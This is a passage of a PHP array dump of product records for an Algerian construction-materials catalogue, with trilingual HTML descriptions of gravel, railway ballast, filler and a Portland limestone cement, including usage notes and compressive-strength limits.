<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 0/4 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
</div>
',
'img_prd' => 'produit-1611822601.png',
'img_prd_detail' => '',
'Code_Pr' => '959',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611738453.pdf',
'pos_slider' => '7'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 4 => array(
'Produit' => array(
'id' => '9959',
'nom_fr' => 'Gravier Ballast',
'nom_ara' => ' حصى الصابورة Ballast حصى',
'nom_en' => 'Gravel Ballast',
'sous_nom_fr' => '25/50 mm',
'sous_nom_ara' => '50/25 مم',
'sous_nom_en' => '25/50 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong> est </span>le lit de pierres ou de graviers sur lequel repose une voie de chemin de fer.</span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif">désigne le mélange de cailloux et de sable répandu sur le sol, sous la voie ferrée. Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> est entré dans l’usage et a supplanté ensablement. </span></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Les éléments du <strong>Gravier Ballast </strong></span></span><span style="font-family:times new roman,times,serif"><span style="color:#000000"> généralement utilisés: de la pierre concassée, de </span><a href="https://fr.wikipedia.org/wiki/Granulom%C3%A9trie" title="Granulométrie"><span style="color:#000000">g</span></a><span style="color:#000000">ranulométrie variant entre 31,5 et 50 mm. Le type de roches utilisées varie suivant les régions et pays en fonction du climat. On trouve des roches de type plutonique : granite, diorite, etc. </span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Les éléments du </span></span><span style="color:#000000"><span style="font-family:times new roman,times,serif"><strong>Gravier Ballast </strong> doivent s'imbriquer de façon à former une masse compacte mais perméable.</span></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></span></p>
<p><span style="color:#008000"><u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Utilisations</span></span></strong></u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></strong></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong></span></span><span style="font-family:times new roman,times,serif"><strong> </strong>est utilisé dans les :</span></span> </p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><strong>Voies Ferroviaires<em> </em></strong></span></small></span></span></p>
</li>
</ul>
<p><span style="color:#008000"><span style="font-size:16px"><u><strong><span style="font-family:times new roman,times,serif">Contraintes</span></strong></u><strong><span style="font-family:times new roman,times,serif"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> subit deux types d'usure :</span></span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Contamination par des matériaux parasites, par exemple de la terre. On procède à des désherbages, mais il est nécessaire de remplacer le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> régulièrement ;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Tassement du <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> sous les traverse; il provoque une déformation verticale de la voie. Il est nécessaire de réinjecter du <strong>Gravier Ballast</strong> de faible granulométrie sous les traverses; ou bien de réaliser une opération d'entretien à l'aide d'une bourreuse. Ce genre d'opération se réalise environ tous les sept ans.</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">On tamise le <strong>Gravier Ballast</strong> chaque vingtaine d'années pour remplacer les pierres brisées. Le <strong>Gravier Ballast</strong> présente une durée d'utilisation d'une quarantaine d'années avant de devoir être intégralement remplacé.</span></span></span></p>
<p> </p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة </strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25/50 مم</strong> هو </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">طبقة</span></span></small> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحجارة أو الحصى الذي يرتكز عليه مسار سكة الحديد.</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">ت</span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px">شير </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> إلى خليط الحصى والرمل المنتشر على الأرض أو أسفل خطوط السكك الحديدية.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">حلت </span><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> محل الطمي عندما دخلت حيز الاستخدام.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">العناصرالمستخدمة في</span></span><span style="font-size:16px"><strong> حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> بشكل عام : الحجر المسحوق ، بحجم حبة يتراوح بين 31.5 و 50 مم. يختلف نوع الصخور المستخدمة باختلاف المناطق والبلدان اعتمادًا على المناخ. توجد صخور من النوع الجوفي: الجرانيت ، الديوريت ، إلخ. </span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب أن تتوافق عناصر</span></span></small><span style="font-size:16px"><strong>حصى الصابورة</strong></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> معًا لتشكيل كتلة مضغوطة ولكنها قابلة للاختراق</span></span></small></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم التحكم في <strong>حصى الصابورة</strong> مقاس <strong>25/50 مم</strong> وفقًا لمعيار <strong>NA 5113</strong>.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><span style="font-size:16px"><strong><u>مجال الاستعمال</u></strong></span><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></small></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة </strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25/50 مم </strong>في :</span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>السكك الحديدية</strong></span></span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><span style="font-size:16px"><strong><u>عراقيل:</u></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">ت</span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px">خضع </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> لنوعين من التآكل:</span></span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التلوث بالمواد الطفيلية ، مثل الأرض. تتم إزالة الأعشاب الضارة ، ولكن من الضروري استبدال </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> بانتظام ؛</span></span></span></li>
<li style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تسوية </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> تحت الأعضاء المتقاطعة ؛ يتسبب في تشوه عمودي للمسار. من الضروري إعادة حقن</span></span><span style="font-size:16px"><strong> حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> ذات حجم الجسيمات الصغيرة تحت العوارض ؛ أو لإجراء عملية صيانة باستخدام آلة الدك. يتم تنفيذ هذا النوع من العمليات كل سبع سنوات تقريبًا.</span></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">نقوم بغربلة </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> كل عشرين عامًا لاستبدال الأحجار المكسورة. يبلغ العمر الافتراضي </span></span></span><span style="color:#FF0000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">ل</span></span></span><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong>حوالي أربعين عامًا قبل أن يتم استبدالها بالكامل.</span></span></span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The <strong>Gravel Ballast 25/50 mm</strong> is the layer of stones or gravel on which the railway track is anchored.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The<strong> Gravel Ballast</strong> refers to the mixture of pebbles and sand spread on the ground or under the railroad tracks. <strong>The Gravel Ballast</strong> came into use and replaced silting.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The elements of the <strong>Gravel Ballast</strong> generally used: crushed stone, with a grain size varying between 31.5 and 50 mm. The type of rocks used varies according to</span></span> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">regions and countries depending on the climate. There are rocks of the plutonic type: granite, diorite, etc. </span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The elements of the <strong>Gravel Ballast</strong> must fit together to form a compact but permeable mass.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The <strong>Gravel Ballast 25/50 mm</strong> is controlled according to the <strong>NA 5113 </strong>Standard.</span></span></p>
<pre style="text-align:right">
</pre>
<p style="text-align:left"><u><span style="color:#008000"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Constraints:</span></span></strong></span></u></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Gravel Ballast undergoes two types of wear:</span></span></p>
<ul>
<li style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Contamination by parasitic materials, eg earth. Weeding is carried out, but it is necessary to replace the <strong>Gravel Ballast</strong> regularly;</span></span></li>
<li style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Settlement of the <strong>Gravel Ballast</strong> under the cross members; it causes a vertical deformation of the track. It is necessary to reinject the <strong>Gravel Ballast</strong> of small particle size under the sleepers; or to carry out a maintenance operation using a tamping machine. This kind of operation is carried out approximately every seven years.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">We sift the <strong>Gravel Ballast</strong> every twenty years to replace the broken stones. The <strong>Gravel Ballast</strong> has a useful life of about forty years before having to be completely replaced.</span></span></p>
',
'img_prd' => 'produit-1611734651.png',
'img_prd_detail' => '',
'Code_Pr' => '9959',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611734651.pdf',
'pos_slider' => '3'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 5 => array(
'Produit' => array(
'id' => '59998',
'nom_fr' => 'Filler 0/0,063 mm ',
'nom_ara' => 'Filler 0/0,063 mm الحشو 0 / 0.063 مم ',
'nom_en' => 'Filler 0/0,063 mm ',
'sous_nom_fr' => '',
'sous_nom_ara' => '',
'sous_nom_en' => '',
'date_ajout' => '2021-01-26',
'image' => '',
'contenu_fr' => '<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm</strong> est un granulat fin destiné à remplir, à charger divers produits des industries du BTP. </span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm </strong>est une<strong> </strong>matière minérale, finement divisée destinée à remplir (de l'Anglais to fill) les vides laissés par un empilement granulaire de graviers, gravillons et sables. </span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le terme <strong>Filler</strong> se rapporte à la petite taille des grains qui le constitue. La nature chimico- minéralogique du <strong>Filler</strong> peut varier, il s'agit généralement de calcaire broyé mais les cendres volantes, la fumée de silice ou une combinaison de ces matériaux peut être utilisée comme <strong>Filler</strong>. </span></span></small></span></p>
<ul>
</ul>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></small></span></p>
<p><span style="color:#008000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><u>Utilisations</u> :</strong></span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm </strong>charge :</span></span></small></span></p>
<ul>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">L'asphalte artificiel à des doses voisines de 10 %, pour son pouvoir rigidifiant ;</span></span></small></span></p>
</li>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Les enrobés bitumineux ,à des doses voisines de 3 à 4 % ou 5 à 6 %, pour son pouvoir rigidifiant ;</span></span></small></span></p>
</li>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Les bétons de ciment hydraulique, à des doses voisines de 50 à 80 kg par m<sup>3</sup>, comme substitution du ciment ; il s'agit le plus souvent de la fumée de silice (micro- ou nanoparticules issues de la métallurgie du silicium et de ses alliages).</span></span></small></span></p>
</li>
</ul>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">L'utilisation des <strong>Fillers</strong> dans des dosages appropriés dans la formulation des bétons permet d'améliorer les propriétés d'écoulement du béton frais et les résistances mécaniques du béton durcis.</span></span></small></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم</strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">- عبارة عن </span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">رمل</span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> ناعم مخصص لملء وتحميل منتجات مختلفة<small> من صناعات البناء.</small></span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم</strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> عبارة عن مادة معدنية مجزأة بدقة تهدف إلى ملء (من الإنجليزية ملء) الفراغات التي تتركها كومة حبيبية من الحصى والشظايا والرمال.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يشير مصطلح <strong>فيلر</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler </strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> إلى صغر حجم الحبوب التي تتكون منها. يمكن أن تختلف الطبيعة الكيميائية المعدنية للحشو ، وعادة ما يكون من الحجر الجيري المطحون ولكن يمكن استخدام الرماد المتطاير أو دخان السيليكا أو مزيج من هذه المواد كمواد مالئة.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يتم التحكم في </span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم </strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> وفقًا لمعيار <strong>NA</strong> <strong>5113</strong>.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:20px"><span style="color:#008000"><strong><small><u>مجال الاستعمال</u> :</small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يملأ <strong>الحشو 0 / 0.063 </strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong><span style="color:#000000"> -</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></small></p>
<ul dir="rtl">
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إسفلت صناعي بجرعات تقترب من 10٪ لقدرته على التقوية ؛</span></span></small></li>
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الخلائط البيتومينية بجرعات تقارب 3 إلى 4٪ أو 5 إلى 6٪ لقوتها التقوية ؛</span></span></small></li>
<li style="text-align: justify;"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">خرسانة </span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الأسمنت الهيدروليكي ، بجرعات قريبة من 50 إلى 80 كجم لكل متر مكعب ، كبديل للأسمنت ؛ غالبًا ما يكون دخان السيليكا (جزيئات دقيقة أو نانوية من تعدين السيليكون وسبائكه)</span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">.</span></span></small></li>
</ul>
<p dir="rtl" style="text-align: justify;"> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">إن استخدام <span style="color:#000000">-<strong>Fillers </strong>-</span> بالجرعات المناسبة في صياغة الخرسانة يجعل من الممكن تحسين خصائص التدفق للخرسانة الطازجة والقوة الميكانيكية للخرسانة المتصلدة.</span></span> </p>
',
'contenu_en' => '<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> is a fine aggregate intended to fill, to load various products of the construction industries.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> is a finely divided mineral material intended to fill the voids left by a granular pile of gravel, chippings and sands.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The term <strong>Filler </strong>refers to the small size of the grains that constitute it. The chemico-mineralogical nature of the <strong>Filler</strong> can vary, it is usually ground limestone but fly ash, silica fume or a combination of these can be used as a <strong>Filler</strong>.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler</strong> <strong>0/0.063 mm</strong> is controlled according to the <strong>NA 5113 </strong>Standard.</span></span></span></p>
<p style="text-align:left"><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>Uses</u> :</span></span></strong></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> charges:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Artificial asphalt at doses close to 10%, for its </span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">stiffening power;</span></span></span></li>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Bituminous mixes, at doses close to 3 to 4% or 5 to 6%, for its stiffening power;</span></span></span></li>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Hydraulic cement concretes, at doses close to 50 to 80 kg per m3, as a replacement for cement; it is most often silica fume (micro- or nanoparticles from the metallurgy of silicon and its alloys).</span></span></span></li>
</ul>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The use of <strong>Fillers </strong>in appropriate dosages in the formulation of concrete makes it possible to improve the flow properties of fresh concrete and the mechanical strengths of hardened concrete.</span></span></span></p>
',
'img_prd' => 'produit-1611671831.png',
'img_prd_detail' => '',
'Code_Pr' => '59998',
'prix_u' => '500',
'fiche_technique' => 'fiche_technique-1615802851.pdf',
'pos_slider' => '1'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 6 => array(
'Produit' => array(
'id' => '78999',
'nom_fr' => 'GICA BETON',
'nom_ara' => 'جيكا بيطون',
'nom_en' => 'GICA BETON',
'sous_nom_fr' => 'CEM II A-L 42.5 N',
'sous_nom_ara' => 'CEM II A-L 42.5 N',
'sous_nom_en' => 'CEM II A-L 42.5 N',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p style="text-align: justify;"> <span dir="ltr" lang="fr"><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Composition</strong></u><strong> : </strong></span></span></span></span></p>
<p style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le<strong> Ciment Portland au Calcaire CEM II/A-L 42,5N -NA 442/2013</strong>- résulte du mélange du clinker en quantité au moins égale à 88-82 % et d’autres constituants tels que le Tuf & la Pouzzolane dont le total ne dépasse pas 7-13 %. </span> <span style="color:rgb(50, 50, 50)"> </span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"><u><strong>Valeurs Limites</strong></u><strong> :</strong></span></span></span><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"> </span><span style="color:rgb(50, 50, 50)"> </span></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Des valeurs limites de résistances minimales sont fixées aux échéances 2 et 28 jours. Des valeurs limites sont également fixées pour la teneur en SO3 inférieure à 3,5 % et la teneur en ions chlorure inférieure à 0,10 %.</span></span></span></p>
<p style="margin-left:21.3pt"><span dir="ltr" lang="fr"><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Valeur limite de résistance à la compression pour CEM II/A-L 42,5N -NA 442/2013-</strong></span></span></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:324px; width:432px">
<thead>
<tr>
<th scope="col" style="height:88px; width:110px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Classe de Résistance</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:142px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite de la Résistance selon la Norme NA 442</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:120px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Inférieure Spécifiée de notre Ciment</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:151px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Supérieure Spécifiée de notre Ciment</strong></span></span></span></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td style="height:85px; width:110px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 jours</strong></span></span></span></p>
</td>
<td style="height:85px; width:142px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></span></p>
</td>
<td style="height:85px; width:120px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>22.08</strong></span></span></span></p>
</td>
<td style="height:85px; width:151px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>25.98</strong></span></span></span></p>
</td>
</tr>
<tr>
<td style="height:57px; width:110px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 jours</strong></span></span></span></p>
</td>
<td style="height:57px; width:142px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>62.5≤res≥42,5</strong></span></span></span></p>
</td>
<td style="height:57px; width:120px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>44,18</strong></span></span></span></p>
</td>
<td style="height:57px; width:151px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>48.49</strong></span></span></span></p>
</td>
</tr>
</tbody>
</table>
<p> </p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Contrôle de la Qualité</strong></u><strong> :</strong> </span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT fabrique et commercialise des Ciments de <strong>Qualité </strong>conformément aux Normes Algériennes en vigueur. Ils sont contrôlés périodiquement par le Centre d’Études et de Services Technologiques de l’Industrie des Matériaux de Construction -CETIM-(accrédité selon le Référentiel ISO 17025). </span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Principaux domaines d’emploi</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong> convient pour les travaux de toute nature en béton armé. Notre ciment est adapté au béton précontraint et au béton armé. De façon générale, le <strong>CEM II/A-L 42,5N</strong> <strong>-NA 442/2013-</strong> est bien adapté pour les travaux massifs exigeant une élévation de température modérée. La classe R sera préférée pour les travaux exigeants des résistances initiales plus élevées. Pour les travaux en milieux agressifs, on emploiera le Ciment pour les travaux à la mer (PM) ou résistant aux eaux sulfatées (ES).</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Précautions particulières</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Lorsque l’aspect esthétique est important (béton brut, enduits), il convient d’éviter l’emploi de certain <strong>CEM II</strong> comportant des proportions importantes de constituants susceptibles d’entraîner des variations de teinte trop marquées, les cendres volantes notamment.</span></span></span></span></p>
